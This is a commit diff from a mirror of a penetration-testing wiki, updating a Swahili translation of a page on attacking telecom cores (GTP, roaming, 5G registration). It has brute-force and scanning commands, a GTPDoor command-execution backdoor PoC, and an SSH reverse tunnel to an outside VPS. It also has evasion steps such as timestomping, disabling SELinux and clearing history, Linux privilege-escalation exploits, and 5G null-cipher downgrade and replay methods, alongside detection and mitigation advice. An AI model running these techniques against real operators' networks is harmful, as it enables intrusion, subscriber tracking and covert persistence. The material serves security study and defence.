maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/generic-methodologies-and-resources/pentesting-netw

Browse Source
This commit is contained in:
Translator 2025-09-07 20:10:57 +00:00
parent aa527db12a
commit dbdfa0e2e2
1 changed files with 150 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

193
src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
View File

@ -1,27 +1,27 @@
# Telecom Network Exploitation (GTP / Roaming Environments) # Utekaji wa Mtandao wa Telecom (GTP / Roaming Environments)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
> [!NOTE] > [!NOTE]
> Protokali za msingi za simu (GPRS Tunnelling Protocol GTP) mara nyingi hupita kwenye mifumo ya GRX/IPX ya kuhamahama ambayo inaaminika kwa kiasi fulani. Kwa sababu zinatumia UDP bila uthibitisho wowote, **mara nyingi mguu wowote ndani ya mipaka ya telecom unaweza kufikia moja kwa moja ndege za ishara za msingi**. Maelezo yafuatayo yanakusanya mbinu za mashambulizi zilizoshuhudiwa katika mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC. > Mobile-core protocols (GPRS Tunnelling Protocol GTP) mara nyingi husafiri kwenye semi-trusted GRX/IPX roaming backbones. Kwa sababu zinatumia UDP wazi bila uthibitisho mwingi, **nafasi ya kuingia ndani ya mipaka ya telecom mara nyingi inaweza kufikia ngazi za uashiriaji za msingi moja kwa moja**. Vidokezo vinavyoifuata vinakusanya mbinu za mashambulizi zilizoshuhudiwa kwenye mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC.
## 1. Recon & Initial Access ## 1. Uchunguzi & Upataji wa Awali
### 1.1 Default OSS / NE Accounts ### 1.1 Akaunti za OSS / NE za Chaguo-msingi
Seti kubwa ya ajabu ya vipengele vya mtandao wa wauzaji huja na watumiaji wa SSH/Telnet waliowekwa kwa nguvu kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Orodha ya maneno iliyotengwa huongeza kwa kiasi kikubwa mafanikio ya brute-force: Seti kubwa, kwa mshangao, ya vendor network elements huja na watumiaji wa SSH/Telnet walio hard-coded kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Orodha maalum ya maneno (wordlist) inaongeza kwa kiasi kikubwa mafanikio ya brute-force:
```bash ```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
``` ```
Ikiwa kifaa kinatoa tu VRF ya usimamizi, pitisha kupitia mwenyeji wa jump kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini). Ikiwa kifaa kinatoa management VRF pekee, pivot kupitia jump host kwanza (angalia sehemu «SGSN Emu Tunnel» hapa chini).
### 1.2 Ugunduzi wa Mwenyeji ndani ya GRX/IPX ### 1.2 Ugundaji wa Host ndani ya GRX/IPX
Watoa huduma wengi wa GRX bado wanaruhusu **ICMP echo** kupitia msingi. Changanya `masscan` na uchunguzi wa `gtpv1` UDP uliojengwa ndani ili haraka kuchora wasikilizaji wa GTP-C: Wengi wa waendeshaji wa GRX bado huruhusu **ICMP echo** kupitia backbone. Changanya `masscan` na probe za UDP zilizojengwa `gtpv1` ili ramani kwa haraka wasikilizi wa GTP-C:
```bash ```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55 masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
``` ```
## 2. Kuorodhesha Wajibu `cordscan` ## 2. Kuorodhesha Abonenti `cordscan`
Zana hii ya Go inatengeneza **GTP-C Create PDP Context Request** pakiti na kurekodi majibu. Kila jibu linafunua **SGSN / MME** inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja. Zana ifuatayo ya Go inatengeneza vifurushi vya **GTP-C Create PDP Context Request** na inarekodi majibu. Kila jibu linafunua **SGSN / MME** ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN aliyotembelewa na abonenti.
```bash ```bash
# Build # Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
@ -29,22 +29,22 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
# Usage (typical): # Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
``` ```
Key flags: Bendera kuu:
- `--imsi` Lengo la mteja IMSI - `--imsi` IMSI ya mteja lengwa
- `--oper` Nyumbani / HNI (MCC+MNC) - `--oper` Home / HNI (MCC+MNC)
- `-w` Andika pakiti za raw kwenye pcap - `-w` Andika vifurushi ghafi kwenye pcap
Misingi muhimu ndani ya binary inaweza kubadilishwa ili kupanua skana: Vigezo muhimu ndani ya binary vinaweza kurekebishwa ili kupanua skani:
``` ```
pingtimeout = 3 // seconds before giving up pingtimeout = 3 // seconds before giving up
pco = 0x218080 pco = 0x218080
common_tcp_ports = "22,23,80,443,8080" common_tcp_ports = "22,23,80,443,8080"
``` ```
## 3. Utekelezaji wa Kanuni kupitia GTP `GTPDoor` ## 3. Code Execution over GTP `GTPDoor`
`GTPDoor` ni huduma ndogo ya ELF ambayo **inafungua UDP 2123 na kuchambua kila pakiti ya GTP-C inayokuja**. Wakati mzigo unapoanza na lebo iliyoshirikiwa awali, yaliyobaki yanachambuliwa (AES-128-CBC) na kutekelezwa kupitia `/bin/sh -c`. Stdout/stderr zinahamishwa ndani ya **Echo Response** ujumbe ili kwamba hakuna kikao chochote cha nje kinachoundwa. `GTPDoor` ni huduma ndogo ya ELF ambayo **inasikiliza UDP 2123 na inachambua kila packet ya GTP-C inayokuja**. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr zinexfiltrated ndani ya **Echo Response** messages ili hakuna outward session ipatikane.
Pakiti ya PoC ya chini (Python): Minimal PoC packet (Python):
```python ```python
import gtpc, Crypto.Cipher.AES as AES import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!" key = b"SixteenByteKey!"
@ -52,38 +52,38 @@ cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00")) enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc)) print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
``` ```
Detection: Utambuzi:
* mwenyeji yeyote anayepeleka **Maombi ya Echo yasiyo sawa** kwa IP za SGSN * host yoyote inayetuma **unbalanced Echo Requests** kwa anwani za IP za SGSN
* Bendera ya toleo la GTP imewekwa kuwa 1 wakati aina ya ujumbe = 1 (Echo) mabadiliko kutoka kwa spesifiki * bendera ya GTP version imewekwa kwa 1 wakati message type = 1 (Echo) deviation from spec
## 4. Pivoting Through the Core ## 4. Pivoting Through the Core
### 4.1 `sgsnemu` + SOCKS5 ### 4.1 `sgsnemu` + SOCKS5
`OsmoGGSN` inatoa emulators ya SGSN inayoweza **kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi**. Mara baada ya kujadiliwa, Linux inapokea kiunganishi kipya cha `tun0` kinachoweza kufikiwa kutoka kwa mwenzi wa roaming. `OsmoGGSN` hutoa SGSN emulator inayoweza **kuanzisha PDP context kuelekea GGSN/PGW halisi**. Mara baada ya makubaliano, Linux hupokea interface mpya `tun0` inayoweza kufikiwa kutoka kwa roaming peer.
```bash ```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \ sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d -APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0 ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy microsocks -p 1080 & # internal SOCKS proxy
``` ```
Kwa matumizi sahihi ya firewall hair-pinning, handaki hii inapita VLANs za ishara pekee na inakufikisha moja kwa moja kwenye **data plane**. Kwa hair-pinning sahihi ya firewall, tunnel hii inapita kando ya signalling-only VLANs na inakuweka moja kwa moja kwenye **data plane**.
### 4.2 SSH Reverse Tunnel juu ya Port 53 ### 4.2 SSH Reverse Tunnel over Port 53
DNS karibu kila wakati iko wazi katika miundombinu ya kuhamahama. Funua huduma ya ndani ya SSH kwa VPS yako inayosikiliza kwenye :53 na urudi baadaye kutoka nyumbani: DNS karibu kila mara iko wazi katika miundombinu ya roaming. Fungua huduma ya ndani ya SSH kwa VPS yako ikisikiliza kwenye :53, kisha rudi nyumbani baadaye:
```bash ```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
``` ```
Check that `GatewayPorts yes` is enabled on the VPS. Hakikisha kwamba `GatewayPorts yes` imewezeshwa kwenye VPS.
## 5. Covert Channels ## 5. Covert Channels
| Channel | Transport | Decoding | Notes | | Chaneli | Usafirishaji | Kuutafsiri | Maelezo |
|---------|-----------|----------|-------| |---------|--------------|------------|---------|
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikivu safi, hakuna trafiki ya nje | | ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji pasivu kabisa, hakuna trafiki ya kutoka |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | inatazama `*.nodep` sub-domain | | DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) imekodishwa katika octets za rekodi A | inatazama sub-domain `*.nodep` |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inachanganyika na mazungumzo halali ya GTP-C | | GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob katika private IE | inajumuika na mazungumzo halali ya GTP-C |
All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed. Implants zote zina watchdogs zinazofanya **timestomp** binaries zao na ku-re-spawn ikiwa zimecrash.
## 6. Defense Evasion Cheatsheet ## 6. Defense Evasion Cheatsheet
```bash ```bash
@ -100,7 +100,7 @@ printf '\0' > /proc/$$/comm # appears as [kworker/1]
touch -r /usr/bin/time /usr/bin/chargen # timestomp touch -r /usr/bin/time /usr/bin/chargen # timestomp
setenforce 0 # disable SELinux setenforce 0 # disable SELinux
``` ```
## 7. Kuinua Haki kwenye NE za Kizamani ## 7. Privilege Escalation kwenye Legacy NE
```bash ```bash
# DirtyCow CVE-2016-5195 # DirtyCow CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
@ -111,30 +111,137 @@ python3 PwnKit.py
# Sudo Baron Samedit CVE-2021-3156 # Sudo Baron Samedit CVE-2021-3156
python3 exploit_userspec.py python3 exploit_userspec.py
``` ```
Usafi wa mazingira: Kidokezo cha usafishaji:
```bash ```bash
userdel firefart 2>/dev/null userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c rm -f /tmp/sh ; history -c
``` ```
## 8. Tool Box ## 8. Zana
* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` zana za kawaida zilizoelezwa katika sehemu za awali. * `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` zana maalum zilizotajwa katika sehemu zilizopita.
* `FScan` : skanning ya TCP ya intranet (`fscan -p 22,80,443 10.0.0.0/24`) * `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
* `Responder` : LLMNR/NBT-NS rogue WPAD * `Responder` : LLMNR/NBT-NS rogue WPAD
* `Microsocks` + `ProxyChains` : pivoting nyepesi wa SOCKS5 * `Microsocks` + `ProxyChains` : pivoting nyepesi ya SOCKS5
* `FRP` (≥0.37) : NAT traversal / bridging ya mali * `FRP` (≥0.37) : uvuka NAT / kuunganisha mali
## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
Taratibu ya usajili ya 5G inaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe na Security Mode Command/Complete, ujumbe wa awali hauhakikiwa na haujasimbwa. Dirisha hili kabla ya usalama linaweza kuwezesha njia mbalimbali za kushambulia wakati unaweza kuangalia au kubadilisha trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed).
Mtiririko wa usajili (ulifupishwa):
- Registration Request: UE inatuma SUCI (SUPI iliyosimbwa) na sifa/uwezo.
- Authentication: AMF/AUSF hutuma RAND/AUTN; UE hurudisha RES*.
- Security Mode Command/Complete: uadilifu na usimbaji wa NAS vinajadiliwa na kuanzishwa.
- PDU Session Establishment: usanidi wa IP/QoS.
Vidokezo vya kuanzisha maabara (si-RF):
- Core: usanidi wa default wa Open5GS unatosha kuiga mtiririko.
- UE: simulator au UE ya majaribio; tumia Wireshark kuchambua.
- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
- Useful display filters in Wireshark:
- ngap.procedure_code == 15 (InitialUEMessage)
- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
### 9.1 Faragha ya kitambulisho: kushindwa kwa SUCI kunachofichua SUPI/IMSI
Kinachotarajiwa: UE/USIM lazima itume SUCI (SUPI iliyosimbwa kwa funguo ya umma ya home-network). Kupata SUPI/IMSI ya plaintext katika Registration Request kunaonyesha kasoro ya faragha inayoweza kuwezesha ufuatiliaji wa mteja kwa kudumu.
Jinsi ya kujaribu:
- Kamua ujumbe wa kwanza wa NAS katika InitialUEMessage na kagua Mobile Identity IE.
- Uhakiki wa haraka wa Wireshark:
- Inapaswa kutafsiriwa kama SUCI, si IMSI.
- Mfano wa vichujio: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` inapaswa kuwepo; kutokuwepo pamoja na kuwepo kwa `imsi` indicates leakage.
Nini cha kukusanya:
- MCC/MNC/MSIN ikiwa imefunuliwa; rekodi kwa kila UE na fuatilia kwa muda/mahali.
Kuzuia:
- Lazimisha UEs/USIMs zinazotuma SUCI pekee; toa tahadhari kwa IMSI/SUPI yoyote katika NAS ya awali.
### 9.2 Kupungua kwa uwezo hadi algorithimu za null (EEA0/EIA0)
Asili:
- UE inatangaza EEA (encryption) na EIA (integrity) zinazotegemewa katika UE Security Capability IE ya Registration Request.
- Mepangilio ya kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algorithimu za null.
Tatizo:
- Kwa sababu Registration Request haijalindwa kwa uadilifu, mshambuliaji aliye on-path anaweza kuzima bits za capability ili kulazimisha uteuzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks vibaya huwaruhusu algorithimu za null hata nje ya huduma za dharura.
Hatua za kushambulia:
- Shika InitialUEMessage na badilisha NAS UE Security Capability ili itangaze EEA0/EIA0 tu.
- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kupeleka mbele.
- Angalia kama AMF inakubali ciphers/udhibiti za null na inakamilisha Security Mode kwa EEA0/EIA0.
Uthibitisho/uwazi:
- Katika Wireshark, thibitisha algorithimu zilizochaguliwa baada ya Security Mode Command/Complete.
- Mfano wa matokeo ya passive sniffer:
```
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001
```
Mikakati ya kupunguza (lazima):
- Sanidi AMF/policy ili kukataa EEA0/EIA0 isipokuwa pale inapohitajika kwa umakini (mf., simu za dharura).
- Pendelea kutekeleza EEA2/EIA2 angalau; rekodi na toa onyo/alaramu kwa muktadha wowote wa usalama wa NAS unaojadiliana na null algorithms.
### 9.3 Replay ya initial Registration Request (pre-security NAS)
Kwa sababu initial NAS haina integrity na freshness, InitialUEMessage+Registration Request iliyorekodiwa inaweza kureplayed kwa AMF.
PoC rule for 5GReplay to forward matching replays:
```xml
<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">
<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>
<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>
</property>
</beginning>
```
Kile cha kuangalia:
- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa freshness/context validation unaonyesha udhaifu.
Mitigations:
- Enforce replay protection/context binding kwenye AMF; rate-limit na correlate per-GNB/UE.
### 9.4 Tooling pointers (reproducible)
- Open5GS: anzisha AMF/SMF/UPF kuiga core; tazama N2 (NGAP) na NAS.
- Wireshark: hakiki decodes za NGAP/NAS; tumia filters zilizo juu kutenganisha Registration.
- 5GReplay: capture registration, kisha replay NGAP + NAS messages maalum kama ilivyo kwenye rule.
- Sni5Gect: live sniff/modify/inject NAS control-plane ili kulazimisha null algorithms au kuingilia authentication sequences.
### 9.5 Defensive checklist
- Fuatilia kila wakati Registration Request kwa SUPI/IMSI zilizo wazi (plaintext); zuia vifaa/USIMs vinavyokiuka.
- Kataa EEA0/EIA0 isipokuwa taratibu za dharura zilizoelezwa kwa ukungu; hitaji angalau EEA2/EIA2.
- Gundua infrastructure haramu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers.
- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara za InitialUEMessage.
--- ---
## Detection Ideas ## Detection Ideas
1. **Kila kifaa kingine isipokuwa SGSN/GGSN kinachounda Maombi ya Kuunda Muktadha wa PDP**. 1. **Kifaa chochote isipokuwa SGSN/GGSN kinachounda Create PDP Context Requests**.
2. **Bandari zisizo za kawaida (53, 80, 443) zinapokea mikono ya SSH** kutoka kwa IP za ndani. 2. **Ports zisizo za kawaida (53, 80, 443) kupokea SSH handshakes** kutoka internal IPs.
3. **Maombi ya Echo mara kwa mara bila Majibu ya Echo yanayolingana** yanaweza kuashiria beacon za GTPDoor. 3. **Echo Requests mara kwa mara bila Echo Responses zinazolingana** inaweza kuashiria GTPDoor beacons.
4. **Kiwango cha juu cha trafiki ya ICMP echo-reply yenye viwanja vikubwa, visivyo na sifuri vya kitambulisho/mfuatano**. 4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply yenye identifier/sequence fields kubwa, zisizo sifuri**.
5. 5G: **InitialUEMessage yenye NAS Registration Requests zinazorudiwa kutoka identical endpoints** (replay signal).
6. 5G: **NAS Security Mode negotiating EEA0/EIA0** nje ya emergency contexts.
## References ## References
- [Palo Alto Unit42 Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) - [Palo Alto Unit42 Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 GPRS Tunnelling Protocol (v16.4.0) - 3GPP TS 29.060 GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 GTPv2-C (v17.6.0) - 3GPP TS 29.281 GTPv2-C (v17.6.0)
- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
- 3GPP TS 24.501 Non-Access-Stratum (NAS) protocol for 5GS
- 3GPP TS 33.501 Security architecture and procedures for 5G System
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}